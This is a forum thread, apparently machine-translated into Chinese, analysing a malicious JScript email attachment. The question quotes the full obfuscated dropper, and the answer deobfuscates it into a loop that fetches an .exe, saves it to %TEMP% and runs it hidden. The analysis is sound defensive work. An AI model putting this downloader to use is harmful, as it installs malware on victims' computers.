任何人都可以告訴這個jscript文件是幹什麼的

Question

我收到了一封垃圾郵件，並且意外下載並點擊了一個.js文件。

任何人都可以幫我找到這個代碼會對我的電腦做些什麼嗎？

Je1JNBH6J=((~(-2015568988123125760*1-1315998909650903040))/(~-3331567897774028800));TN3MA4ULF=Je1JNBH6J; 
var pov7iA4Ir7=0;var foCdQVydV3pB='';var IGiKzGuZbn=(((~-49)*(~-2)+(7<<32))<<(268435456>>>28));m7lKLSD=[]; 
var SGcCknE=0;var by7Xpy=foCdQVydV3pB+' '; 
IGiKzGuZbn=IGiKzGuZbn*(((524288000>>>0x2)>>>(0x12<<32))<<(384>>>7));foCdQVydV3pB=foCdQVydV3pB+new Date(); 
while(IGiKzGuZbn>(((72*2+0x5)*(67108864>>>26)+(200>>>0x1))%(1<<0x20))){WqDXL_YB9n=foCdQVydV3pB.split(by7Xpy);m7lKLSD.push(WqDXL_YB9n[IGiKzGuZbn%(3+3)]);IGiKzGuZbn=IGiKzGuZbn-1;} 
UOD6Yum6uOpU='' + 'R' + ('faK', 'QS', '4Tu', 'u0'.ind()) + 'n'; 
DJIZQpZhgUK=['' + ('vy', 'EJx', 'heO'.ind()) + ('VN', '8VC', 'tq'.ind()) + ('0Jf', 'HWS', 'PB6', 't7q'.ind()) + ('im', 'R6', 'pl'.ind()) + ('lr', '8I', 'Db5', 's2'.ind()) + ('sva', 'IP', ':6'.ind()) + '/' + ('k4m', '/H'.ind()) + ('5s_', 'Qil', 'f6O', 'cuG'.ind()) + ('00', 'U_J', 'onY'.ind()) + ('1_', '4Ck', 'rT'.ind()) + ('ub', '4zN', 'hi', 'djH'.ind()) + ('vm', 'h8P', 'ez'.ind()) + ('vj', 'QZ', 'Tg9', 'lB'.ind()) + ('P6', 'lj'.ind()) + ('LU', 'C7l', 'a6c'.ind()) + ('Yv2', 'T2', 'zr', 'nnl'.ind()) + 'd' + ('pX', 'Wi', 'cY'.ind()) + 'o' + '-' + ('X5K', 'jZ', '3h', 'mPA'.ind()) + ('nN', 'yuY'.ind()) + ('KMs', 'QX', 'dPW', '.dn'.ind()) + 's' + ('L9a', 'hD'.ind()) + ('g1x', 'aiH'.ind()) + 'r' + ('mx8', 'eEy'.ind()) + ('Qwv', 'p_'.ind()) + ('c3', 'oU'.ind()) + ('40', 'Nw', 'ib'.ind()) + ('GlP', 'nG'.ind()) + ('Vu', 'l2', 'twn'.ind()) + ('zt', 'Gdp', 'NR', '.6S'.ind()) + ('UJ', 'UnI', 'cVn'.ind()) + ('awj', 'F2P', 'oG'.ind()) + ('vN', 'au', 'tNO', 'm_i'.ind()) + ('3T1', '/K'.ind()) + ('3yp', 'bS4', 'pt'.ind()) + ('1lo', 'CR8', 'eaS'.ind()) + ('zC', 'H6', 'rS'.ind()) + ('_6V', 's0'.ind()) + ('dFH', 'ovG', 'oeP'.ind()) + ('Za8', 'SJ', 'nL'.ind()) + ('mzH', 'qV', 'Nfr', 'aGD'.ind()) + ('lk', 'GF', 'lYh'.ind()) + ('Y9', 'jRm', '/4'.ind()) + ('oo', '0Az', 'wmE', 'e3S'.ind()) + ('CD', 'jJ', 'ilB'.ind()) + ('wU', '18', 'sdO'.ind()) + ('fMR', '5pd', 'blV'.ind()) + 'i' + ('RB', 'lA'.ind()) + ('20', 'zyd', 'luv'.ind()) + ('WI', '_b'.ind()) + ('Mw', 'INh', 'cOC'.ind()) + ('Pit', 'NJ', 'o4r'.ind()) + ('7DP', 'q74', 'Li', 'r0'.ind()) + ('Ap', 'dx'.ind()) + ('1K', '973', 'm4', 'e1'.ind()) + ('yXh', 'WFo', 'lA'.ind()) + ('0k', 'loz'.ind()) + ('lWd', 'wOo', 'hww', 'a1'.ind()) + ('ITq', 'nWg'.ind()) + ('ad', '2c', 'dT'.ind()) + ('FjC', 'cSk'.ind()) + ('6s3', 'Yz', 'oI'.ind()) + ('vS', '_7'.ind()) + 'c' + ('eNB', 'oV'.ind()) + ('qf', 'HeV', '_G9'.ind()) + 'u' + 'k' + ('5ZY', '/3C'.ind()) + ('il', 'qG', 'fis', '_M'.ind()) + ('4O', '2b1', 'l5w'.ind()) + ('Ct8', 'ab9'.ind()) + ('_3w', 'KQ', 'y3'.ind()) + ('1_', 'Y1', 'hl', 'oT'.ind()) + ('G46', 'uS'.ind()) + ('zN', 'gfV', 'cMm', 'tz'.ind()) + ('vX8', 'SCH', 'ERE', 'sdZ'.ind()) + ('Js', '/H'.ind()) + '1' + ('vqh', 'Miv', '5V'.ind()) + ('IIf', '/k'.ind()) + ('pm', 'gE'.ind()) + ('Ze2', 'uxD'.ind()) + ('bJX', 'eg'.ind()) + ('8qd', 'sGQ'.ind()) + ('Fr', 'tUD'.ind()) + 'a' + ('HU', 'Kl', '3ap', 'cOO'.ind()) + ('rTu', 'N_', 'ce5'.ind()) + ('8Lc', 'ebT'.ind()) + ('QkA', '0O', 'sq'.ind()) + ('JP', 'sO'.ind()) + '.' + 'a' + ('20b', '7d', 'srg'.ind()) + ('3u_', 'LB1', 'pC'.ind()) + ('Htp', 'bN', 'xG'.ind()) + ('l0J', 'Pn', '9o', '?N'.ind()) + 'd' + ('0v', '6DU', 'zX', 'oR'.ind()) + ('bCj', 'nT', 'cLB'.ind()) + 'i' + ('bM', 'sk', 'kfG', 'dU'.ind()) + ('JN', '20', '=W'.ind()) + ('Ha', '7A', '0m', '0N'.ind()) + ('L3', '0v'.ind()) + 'd' + ('F_', 'ZJ', '4yZ'.ind()) + ('iKr', 'NvD', 'tGj', '5d9'.ind()) + ('luM', 'eVA'.ind()) + ('Jzy', 'yI', 'XSZ', 'al9'.ind()) + ('sk', '_i', '2Ap', 'cN'.ind()) + ('sV', 'EOP', 'z5o', 'bzI'.ind()) + ('wg', 'Lo', '61'.ind()) + '4' + ('85', '0DX'.ind()) + ('nV', '4G'.ind()) + ('Oxn', '4I8'.ind()) + ('Kel', 'QeX', 'zuo', 'eoH'.ind()) + ('SO8', '5hn', '2G9'.ind()) + ('12', '9GV'.ind()) + ('UK', 'atQ'.ind()) + ('DST', 'WO', '9V8'.ind()) + ('tb2', '9os'.ind()) + ('iz', 'x4', '1e'.ind()) + ('0H', '0F'.ind()) + ('qE', '9R_', 'agD'.ind()) + ('RD', '8b'.ind()) + ('IA', 'dU'.ind()) + ('qT', 'Mp', '0Jr'.ind()) + ('v3', '624'.ind()) + ('wF', 'i02', 'bgu'.ind()) + ('Sby', 'qxX', '8JX'.ind()) + ('10r', '5O'.ind()) + ('sE', '3w'.ind()) + ('M1', 'EV', 'cX'.ind()) + ('QD', 'i8P', '21t'.ind()) + ('7v', '&Re'.ind()) + ('kqa', 'IT6', 'alW'.ind()) + ('oOD', 'ux'.ind()) + ('UK', 'tT'.ind()) + ('5Ar', 'PY', 'hch'.ind()) + ('dk', 'PE', 'oN0', 'khS'.ind()) + ('I50', 'um', 'eu_'.ind()) + ('tZ0', 'yJi'.ind()) + ('UY', '=u'.ind()) + ('4P', 'L9', 'A78'.ind()) + 'S' + '4' + ('cfn', 'p4i'.ind()) + 'D' + ('nJ', 'xI1', 'OH'.ind()) + '1' + ('i7', 'lky', 'frI', '7ju'.ind()) + ('ge0', 'Am'.ind()) + ('SwS', 'B_U', 'PA'.ind()) + ('JQC', 'ga'.ind()) + ('urm', '5_', '8G'.ind()) + ('gh', 'ug', 'e5', 'Upb'.ind()) + ('O7M', 'A64', 'iLB'.ind()) + ('_YT', 'OM', '5nH'.ind()) + ('Ku', 'p1X', '4i', 'x9'.ind()) + 'q' + ('kWk', 'Ru', 'o7R'.ind()) + ('ZQZ', 'bta'.ind()) + ('F_', 'Zs'.ind()) + ('Bu4', 'kc'.ind()) + ('09', 'uM', '47N', '4xw'.ind()) + ('62Y', 'mL', 'vh', 'IEm'.ind()),'' + ('37w', 'hpM'.ind()) + ('Fy', 'tb'.ind()) + ('Xq', 'tA'.ind()) + ('utM', 'Bk', 'pqq'.ind()) + ('Le', 'Ev', 'K1', 's_P'.ind()) + ':' + ('SfT', 'tC', '3e', '/S'.ind()) + ('Ee', '3G', '/8'.ind()) + ('vN', 'sj6', '0J1', 'tn'.ind()) + 'h' + 'e' + ('X0', 'ft'.ind()) + ('Des', 'gC5', '0H_', 'd9'.ind()) + ('Gi8', 'cnQ'.ind()) + ('MI', 'ee'.ind()) + ('a4', 'nqv'.ind()) + ('dD', 'hn', 'uRx', 't4'.ind()) + ('UD', 'rZ'.ind()) + ('uG', 'eu'.ind()) + ('P2', 'n9', '-u'.ind()) + ('4a', 'mx2'.ind()) + ('pI', 'hlp', 'yr'.ind()) + ('rX', 'q7k', '4XV', '.Zr'.ind()) + ('7ok', 'bC', 'l2', 'sx0'.ind()) + ('Jz', 'PQ', '8G', 'hV'.ind()) + ('60', 'mJ', 'rR', 'avP'.ind()) + ('8ad', 'x7G', 'UY', 'riB'.ind()) + ('sNi', 'VA', 'WL', 'eh'.ind()) + ('sP', 'pL'.ind()) + 'o' + ('wO', '8pO', 'llx', 'iu_'.ind()) + ('8t', 'Vw', 'Wm', 'n89'.ind()) + ('wI', 't0'.ind()) + ('CA', 'kb5', 'ea', '.Z'.ind()) + ('iu', 'EIq', 'yvz', 'cI1'.ind()) + ('Fhj', 'o4'.ind()) + ('xs', 'dPk', 'N0g', 'mWq'.ind()) + ('eN', 'iu', '5m', '/5'.ind()) + ('dp', 'pLC'.ind()) + ('Fup', '8bT', '0NM', 'eq'.ind()) + 'r' + ('aP', 'f2', 'sO'.ind()) + ('e6', 'bvB', 'zJ', 'oT'.ind()) + ('HW', 'Hl', 'hIi', 'nt'.ind()) + ('Lih', 'pui', 'pl', 'aRG'.ind()) + ('LhG', '1M', 'lPm'.ind()) + ('nuy', 'xk', 'c2', '/sc'.ind()) + ('TE9', 'XoJ', 'plf', 'clr'.ind()) + ('g6a', 'rF4'.ind()) + ('jJL', 'ig'.ind()) + ('Nzf', 'smH'.ind()) + ('FpO', '4g', 'pXM'.ind()) + ('i88', 'i1'.ind()) + ('VCp', '3N', 'n0k'.ind()) + ('6WV', 'rpj', '_4F'.ind()) + ('IkY', '8hL', 'oe', 'm8'.ind()) + ('76', 'aW'.ind()) + ('cGI', 'SkV', 'w8', 'rc'.ind()) + ('LS', 'Law', 'dWL'.ind()) + ('lJ_', 'oA'.ind()) + ('Ww', 'ro', 'n7M'.ind()) + ('bCT', '_7n', 'TS', '_lQ'.ind()) + ('nL', 'Iwr', 'QxK', 'tm'.ind()) + ('gY', 'h5b'.ind()) + 'e' + ('9T', 'f9'.ind()) + ('KR_', 'dR'.ind()) + ('Dbs', 'Ww', 'cJ'.ind()) + ('BI', 'o0', 'iFj', 'eJk'.ind()) + ('Ovw', 'kG', 'rj', 'nDu'.ind()) + ('Rz', 'L6W', 'tG'.ind()) + ('hY', 'cr0', 'r6'.ind()) + ('Cuz', 'e2'.ind()) + ('qEy', 'Fwm', '_h'.ind()) + ('dch', 'S4', 'DwU', 'c9'.ind()) + ('uiU', 'oL'.ind()) + ('h8A', 'T2', 'fHP', '_D'.ind()) + ('0x', 'bg', 'pj', 'uL'.ind()) + ('cJN', 'Ie2', 'kr'.ind()) + ('fC', 'Ce', '/n'.ind()) + '_' + ('Wy', 'Uw', 'lJ2'.ind()) + 'a' + ('eK', 'yk4'.ind()) + ('uG3', 'oGR'.ind()) + ('CH8', 'uk'.ind()) + ('1ok', 'a3', 't8'.ind()) + ('9BG', 'ykK', 'F0C', 'snq'.ind()) + ('sE5', '9e', '/Yx'.ind()) + ('BZ', '1_k'.ind()) + ('jH', 'I4S', '5b'.ind()) + ('NAh', 'Vl', '/SV'.ind()) + ('QZ', 'ac', 'ug', 'g8p'.ind()) + ('jV', 'uWG'.ind()) + ('Il', 'ep'.ind()) + ('fs', 's36'.ind()) + ('sMF', 'tBM'.ind()) + ('Hwr', 'R1p', 'a6'.ind()) + ('LX', 'DW_', 'tJ', 'cOO'.ind()) + ('emg', 'ajQ', 'OX', 'cjp'.ind()) + ('xa', 'et'.ind()) + 's' + ('_r4', 'qC', 'sI4'.ind()) + ('af_', 'r2Z', 'rNA', '.UT'.ind()) + ('aGg', '0ii', 'Ta', 'ap'.ind()) + 's' + ('sD', 'pOS'.ind()) + ('lL', 'tv', 'xaL'.ind()) + ('uYT', '?X'.ind()) + ('FO', 'tR', 'dR0'.ind()) + ('O3M', 'yI', 'os'.ind()) + 'c' + ('V9', 'g3', 'uEh', 'i7z'.ind()) + ('R1', 'd7a'.ind()) + ('Qd6', 'U1A', 'd43', '=ft'.ind()) + '0' + ('lz', 'yN', '5BG'.ind()) + ('qO', 'vHh', 'eBf', '6z'.ind()) + ('xQg', '7x'.ind()) + ('X3z', '1Q3'.ind()) + ('qc', 'Wa', '6CU', 'cn'.ind()) + '4' + ('f8', 'a2'.ind()) + ('dU', 'fWk', '7Y'.ind()) + ('0B5', 'Oe', 'dSU'.ind()) + ('Xnm', 'fE'.ind()) + ('lE8', 'Lt', '3F'.ind()) + ('ba', 'h5', 'MuC', 'fbA'.ind()) + ('6Io', 'Iaf', '4Uo'.ind()) + ('gbf', 'dz'.ind()) + ('uMd', 'yjq', 'egu'.ind()) + ('iWD', 'qjf', 'bM3'.ind()) + ('Wi', 'udA', 'Fyu', '9U'.ind()) + ('dR5', '8e'.ind()) + ('lF', 'vDD', 'apr', '26s'.ind()) + ('Lwl', '_y', '5A'.ind()) + ('ph', 'fc'.ind()) + ('AS', '8b'.ind()) + 'e' + ('VI', '4lF', '9Kc'.ind()) + ('FKX', 'bh'.ind()) + ('kW', 'I7S', 'KU2', '4F'.ind()) + ('o7', '6V', '51', 'e9i'.ind()) + ('dl', 'cFp'.ind()) + ('DO6', 'G1', '84'.ind()) + ('mj', 'bg', 'bo', 'eH'.ind()) + ('Zle', 'Bv', 'euj'.ind()) + ('J10', 'bGF', 'B5e', 'f7f'.ind()) + '&' + ('uH', 'mGJ', 'dL', 'aN'.ind()) + ('Uyt', 'EK', 'cmk', 'ue4'.ind()) + ('aH', 'tq'.ind()) + ('C1E', 'ca', 'hb'.ind()) + ('V5d', '1Ps', 'kj'.ind()) + ('N6', 'ePh'.ind()) + ('l7', 'OvX', 'yz2'.ind()) + ('Ykr', 'FW', '=O'.ind()) + ('gH_', 'uuY', 'Ad'.ind()) + ('XH', 'ie', 'Zj'.ind()) + ('6k', 'Hf', 'TDB', 'w5d'.ind()) + 'b' + ('nt', 'NO'.ind()) + ('AC', '_2b', 'FU'.ind()) + ('UcS', 'EI9', 'mrM'.ind()) + ('ECH', '36'.ind()) + ('yOe', 'RQ', 'HH'.ind()) + ('yR', 'i5'.ind()) + ('Gy', '73', 'gop'.ind()) + ('am', '2a', 'NTO', 'G0'.ind()) + ('1Eb', 'oEK', 'RI4', 'vr9'.ind()) + ('CSQ', 'pz', 'AM'.ind()) + ('u4', 'nZ_', 'yIo'.ind()) + ('M8e', '1kz'.ind()) + 'x' + ('wz', 'l50', '5pF', 'Ljn'.ind()) + ('HV', 'Ma', 'mWT', 'eJ'.ind()) + ('3KE', 'ZI', 'byW'.ind()) + 'I' + ('Xe', 'LC', '3pQ', 'sv'.ind()) + ('m4', 'BwP', '8l'.ind())]; 
AmQnTHcQt='' + ('c4o', 'wt', 'Xt', 'EtB'.ind()) + ('F63', 'Ziu', 'kc9', 'xN'.ind()) + ('Rbf', 'ELV', 'pgT'.ind()) + ('IPf', '3k9', 'a0'.ind()) + ('Qtl', 'LY', 'rW', 'nOA'.ind()) + ('fJ', 'XJP', 's83', 'dSS'.ind()) + ('sI', 'Xx', 'Ev'.ind()) + ('Xl', 'xWJ', 'lP', 'nI'.ind()) + ('um', 'vD5'.ind()) + ('R_T', 'iH'.ind()) + ('tp9', 'rAN'.ind()) + ('L66', '5u', 'Mvp', 'o9'.ind()) + ('f2', 'nWm'.ind()) + ('z3X', 'zg1', 'vo7', 'mVi'.ind()) + ('Gw', 'xKl', 'eOZ'.ind()) + 'n' + ('Hu', 'Er', 'tP'.ind()) + ('1Z', 'SUI'.ind()) + ('5z', 'tKI'.ind()) + ('Am9', 'MQO', 'r_0'.ind()) + ('TH', 'd0i', 'if'.ind()) + 'n' + ('7gz', 'NM', 'gqc'.ind()) + ('im', 'Qb', 'sD'.ind()); 
qvckpXo=this['' + ('cn0', 'mKM', 'oqd', 'AR'.ind()) + 'c' + ('wY', 't88'.ind()) + ('nl', 'ii'.ind()) + ('KPT', 'UP', 'v5C'.ind()) + 'e' + ('XRF', 'Xw'.ind()) + ('Y61', 'Ol'.ind()) + ('uEk', 'bI'.ind()) + ('zX', 'j3Y'.ind()) + ('XhD', 'sr', 'XG', 'eBr'.ind()) + ('aJx', 'tU', 'c_G', 'ceA'.ind()) + ('Xpe', 'fAV', 'tt'.ind())]; 
f61cYXw=new qvckpXo('' + 'W' + ('F3', 'Sp'.ind()) + ('0sg', 'cM7'.ind()) + ('QAC', 'r7'.ind()) + ('Qb', 'Y6', 'i5W'.ind()) + ('Rr', 'px5'.ind()) + 't' + ('E7N', 'lQ', '.o'.ind()) + ('csj', 'N4w', 'RiE', 'Sp'.ind()) + 'h' + ('6R', 'XE', 'HR9', 'eXR'.ind()) + ('9np', 'du', 'Q8K', 'l1K'.ind()) + ('Ub', 'lo'.ind())); 
OZ3UijftXXL=f61cYXw[AmQnTHcQt]('' + ('wv', 'KpM', '%q'.ind()) + ('YDZ', 'yLN', 'T3P'.ind()) + ('iv2', 'UaB', 'Ed'.ind()) + ('Rc', 'Mu'.ind()) + ('JJ', 'v8H', 'SJW', 'Po1'.ind()) + ('CV', 'ona', '%ED'.ind()) + ('1g', 'pJA', 'ch', '/1j'.ind()) + 'c' + ('0i', 'fml', 'FVx'.ind()) + ('ie', 'h8i'.ind()) + ('Co', 'LU', 'Z_0'.ind()) + ('D8o', '7T', 'zfa'.ind()) + 'A' + ('PUJ', 'QlI', 'd3t', 'RI'.ind()) + ('TF', 'diQ'.ind()) + ('KTX', 'em', 'Fi', '.mx'.ind()) + ('Z_K', 'Az', 'eEK'.ind()) + ('Qu', 'Dvx', 'xwx'.ind()) + 'e'); 
try{zl_FTnl0hrrl=new qvckpXo('' + ('Xvx', 'wo', 'MF'.ind()) + ('t0', 'yuM', 'Zg', 'S1'.ind()) + ('KAd', 'um', 'XZ7'.ind()) + ('3C', 'Ar', 'MY'.ind()) + ('bA', 'tDi', 'OSu', 'L_8'.ind()) + ('9q', '2n'.ind()) + ('khO', 'V7', 'gw', '.j4'.ind()) + ('MjD', 'hA2', '8W', 'X6'.ind()) + ('ZE', 'GqM', 'Mmi'.ind()) + ('Gv', 'hvW', 'JD', 'LG'.ind()) + ('LC', 'Hg'.ind()) + ('Pu9', 'Th'.ind()) + ('4Jf', 'YD', 'TJs'.ind()) + ('qz', 'nvA', 's0c', 'PW'.ind())); 
while(pov7iA4Ir7==(((0x12d<<32)>>(0x100>>0x3))%(~-2))){zl_FTnl0hrrl['' + ('cYc', 'q7', 'VsN', 'oBz'.ind()) + ('ix', 'Amm', 'pyZ'.ind()) + ('wt', '589', 'egM'.ind()) + ('o9r', 'nmF'.ind())]('' + ('SrA', '3rP', 'GUW'.ind()) + 'E' + 'T',DJIZQpZhgUK[SGcCknE], 0); 
++SGcCknE;if (SGcCknE==DJIZQpZhgUK.length) SGcCknE=((~(-427008>>10))%(0x100>>8));zl_FTnl0hrrl['' + ('5ii', 'NAH', 'bA', 'sEg'.ind()) + ('e_', 'Ey', 'eIT'.ind()) + ('Fu0', '1w2', 'ns'.ind()) + ('NnF', 'SRa', 'a1', 'dj'.ind())](); 
while(zl_FTnl0hrrl['' + ('zYA', 'rew'.ind()) + ('pT', 'mtL', 'eEm'.ind()) + ('osK', 'axQ'.ind()) + ('lLa', 'dc'.ind()) + ('yY', 'yaj', 'y2'.ind()) + ('pv', 'sfx'.ind()) + ('pr', 'tDm'.ind()) + ('yMU', 'YXI', 'uJ', 'aKX'.ind()) + ('2Ur', 'u2', 'tgd'.ind()) + ('Pac', 'eN'.ind())]<(~((-327680>>16)<<(0x4000000>>0x15)))){ f61cYXw['' + ('EQ', 'SUb'.ind()) + ('M7', 'lFU'.ind()) + ('_s', 'eAQ'.ind()) + ('9x3', 'ATo', '5z', 'eQ'.ind()) + ('WR', 'oXL', 'tpn', 'pUp'.ind())]((((1677721600>>>0x8)>>(5*3+0x3))<<(0x48a6d32fcd5f7800/2617551909563644928)));} 
DyrGoJP=zl_FTnl0hrrl['' + ('xQ2', 'Rwg', 'C7q', 'sfs'.ind()) + ('hHi', 'aKC', 'GjS', 'tJn'.ind()) + ('sr', 'a97'.ind()) + ('HrV', 'uuw', 'tFS'.ind()) + ('58L', 'hW4', 'uU'.ind()) + ('y7', '0v_', 'Hj', 'sq2'.ind()) + ('fE', '_gY', '57', 'Tl'.ind()) + ('eeE', 'er'.ind()) + ('d3', 'fHB', 'x3'.ind()) + ('dV', 'Bs3', 'w8m', 'tCe'.ind())]; 
if (DyrGoJP&&DyrGoJP=='' + ('ty', 'vCS', 'b0', 'O4y'.ind()) + 'K') pov7iA4Ir7=((~(-871990328195826688*0x4-0x6436e39f39ee600))/(~-3939286895629956608));} 
XsdyJC_M4=new qvckpXo('' + ('o3', '1P', 'Apo'.ind()) + ('10', 'DpG'.ind()) + ('5k', 'xa', 'OA'.ind()) + ('Jst', '0zU', 'DMy'.ind()) + ('x1E', '4Bs', 'wC', 'Bkl'.ind()) + ('IYU', 'qC_', '.aS'.ind()) + ('pd', 'SHa'.ind()) + ('N8o', 'IX', 'ti'.ind()) + ('zU', 'gr', 'kO', 'rt'.ind()) + ('C1H', 'ek'.ind()) + ('mJS', 'Cd', 'vGs', 'a9'.ind()) + ('gw', 'mh'.ind())); 
XsdyJC_M4['' + ('Q6', 'Eb', 'T0', 'o5'.ind()) + ('iEo', 'Fh', 'pIC'.ind()) + ('T2_', 'wOq', 'Aj', 'e9l'.ind()) + ('LGc', 'xO', 'nt'.ind())](); 
XsdyJC_M4['' + ('vy', 't5'.ind()) + 'y' + ('IZ', 'ZSV', 'S2z', 'pcP'.ind()) + ('UaF', 'vQw', 'e5'.ind())]=Je1JNBH6J; 
XsdyJC_M4['' + ('Q1', 'Yk', 'wqK'.ind()) + ('kXk', 'rDe'.ind()) + ('YQ', 'Mp', 'xN5', 'ibm'.ind()) + ('PPJ', 'pR', 't0k'.ind()) + ('UkA', '0zs', 'PNm', 'eX'.ind())](zl_FTnl0hrrl['' + ('rjF', 'Fq', 'xC', 'R9D'.ind()) + ('dF', 'Ck', 'S8_', 'era'.ind()) + ('61', 'qs', 'sP'.ind()) + ('SOG', 'NWu', '5G', 'pFo'.ind()) + ('QL', 'fI', 'oEC'.ind()) + ('rj', 'nA'.ind()) + ('Ain', 'KkJ', 'V9J', 'sL'.ind()) + ('8b', 'zjI', 'p7b', 'eg'.ind()) + ('VoT', 'plT', 'BjG'.ind()) + ('Emh', 'P8', 'oV'.ind()) + ('FG', 'duX'.ind()) + ('Lw9', '8e', 'y50'.ind())]); 
XsdyJC_M4['' + ('Sw', 'jUQ', 'gtH', 'py'.ind()) + ('tbU', 'iGw', 'Y1', 'odA'.ind()) + ('2_', 'sg'.ind()) + ('Jx2', 'i7E'.ind()) + ('564', 'zS6', 'tW'.ind()) + 'i' + ('9zW', '1mG', 'oM'.ind()) + ('uOa', '2px', 'a5R', 'njK'.ind())]=Je1JNBH6J-TN3MA4ULF; 
XsdyJC_M4['' + ('QL', 'US', 'sa'.ind()) + ('Jso', 'Zr9', 'MhF', 'acW'.ind()) + ('ifI', 'vV2'.ind()) + ('aqv', 'eq', '18', 'etE'.ind()) + ('Ka', 'RkN', 'a2z', 'Tk'.ind()) + ('OEz', 'sg', 'o1'.ind()) + ('AB', 'FIT'.ind()) + ('8MY', 'GNZ', 'O3o', 'iC5'.ind()) + ('APb', 'S3', 'ln'.ind()) + ('rzl', 'ZBb', 'eE'.ind())](OZ3UijftXXL,Je1JNBH6J+TN3MA4ULF); 
XsdyJC_M4['' + ('Ua3', 'c3'.ind()) + ('BL', 'l4'.ind()) + ('oP', 'oB'.ind()) + 's' + ('Dn', 'ej5'.ind())](); 
f61cYXw[UOD6Yum6uOpU](OZ3UijftXXL,(((43515904<<3)>>>(5<<0x2))%(0x40000>>>18)),TN3MA4ULF-Je1JNBH6J); 
}catch(kBK9Io1f){}; 
function String.prototype.ind(){var isJyaQmVan2=this.split('');var UcopuBb5b=isJyaQmVan2.length*6-3;var QBkFdVEknF=Je1JNBH6J-TN3MA4ULF;if (Number(m7lKLSD[UcopuBb5b])+TN3MA4ULF==(((0x1e9800>>>11)*(0x20000000>>>0x1d)+(82<<32))*(0x100000>>>20)+(31358976>>>0xf))) QBkFdVEknF=isJyaQmVan2.length;return isJyaQmVan2[isJyaQmVan2.length-QBkFdVEknF];} 

Answer 1

我手動反混淆，並得到這個（變量名礦）：

var got_success = 0; 
var current_url = 0; 

urls = ["https://REDACTED.sharepoint.com/REDACTED", "https://REDACTED.sharepoint.com/REDACTED"]; 
axobj = this.ActiveXObject; 
shell = new axobj("WScript.Shell"); 
exePath = shell.ExpandEnvironmentStrings("%TEMP%/cFhZzARd.exe"); 
try { 
    msxmlHttp = new axobj("MSXML2.XMLHTTP"); 
    while (got_success == 0) { 
     msxmlHttp.open("GET", urls[current_url], 0); 
     ++current_url; 
     if (current_url == urls.length) current_url = 0; 
     msxmlHttp.send(); 
     while (msxmlHttp.readystate < 4) { 
      shell.Sleep(100); 
     } 
     statusText = msxmlHttp.statusText; 
     if (statusText && statusText == "OK") got_success = 1; 
    } 
    adodbStream = new axobj("ADODB.Stream"); 
    adodbStream.open(); 
    adodbStream.type = 1; 
    adodbStream.write(msxmlHttp.ResponseBody); 
    adodbStream.position = 0; 
    adodbStream.saveToFile(exePath, 1 + 1); 
    adodbStream.close(); 
    shell.Run(exePath, 0, 0); 
} catch (ex) {}; 

所有它做的是下載和從它的其中一個網址（我節錄安全運行.exe文件原因，但是任何真正好奇的人都可以做同樣的事情，我可以找到它們）。 .exe是會造成真正傷害的，並且不知道它會做什麼，雖然勒索軟件可能是一個很好的猜測。

（對於其他人來看這個混淆，所有String.prototype.ind（）的確是返回字符串的第一個字符。）